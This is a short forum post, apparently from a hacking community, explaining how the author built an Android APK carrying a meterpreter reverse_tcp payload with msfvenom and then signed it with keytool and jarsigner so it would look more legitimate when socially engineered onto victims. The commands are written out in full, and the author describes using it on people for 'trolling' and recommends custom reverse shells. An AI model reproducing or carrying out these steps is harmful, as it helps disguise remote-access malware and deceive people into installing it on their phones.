As @pry0cc insisted that I create a post on how I manually signed a apk file in my post. As requested, here it is. Although please see this link here which is the reference that I used for my so called 1337 hax. Before I begin, what you'll need is:
- A brain (please)
Generating apk file
The first step is of course generating the apk file with meterpreter embedded in the file, of course any payload is usable, but I used the payload; android/meterpreter/reverse_tcp with lport 8080 and my external IP address. The command I used was:
msfvenom -p android/meterpreter/reverse_tcp lhost=127.0.0.1 lport=8080 > z.apk
Of course you could try to just social engineer the apk file as it is, but I found that if you sign the apk file it is more "realistic", but of course it is your choice.
Signing apk file
There are two tools you'll need, Keytool and Jarsigner. The first step is generating the keystore. When I did this, I didn't change much for the command used. Why? It was late and I really didn't care that much.
Anyways, the command used was:
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
the command is pretty self explanatory.
Now it is time to sign the apk file using this command:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname
Again, modify the flags as need be.
Of course, you could just verify the apk file with this command:
jarsigner -verify -verbose -certs APPNAME.apk
but I took the risk without checking the apk file because I'm a 1337 haxor.
And that's it.
Of course without having a victim it isn't fun doing all this sooo hard work. I gotta admit, this is lazy and a skid move, but when it comes to SE, it works almost all the time if you do it right. I do not recommend you to use meterpreter unless you are trolling like I do and this will not work on those that are intelligent enough. I recommend your very own coded reverse shell above all else like these tut that @0x00pf wrote which helped me out a lot to learn about reverse shells. Thank you!
Anyways, I think that basically wraps everything up at least for now and I hope this does clear up some confusion and some doubts.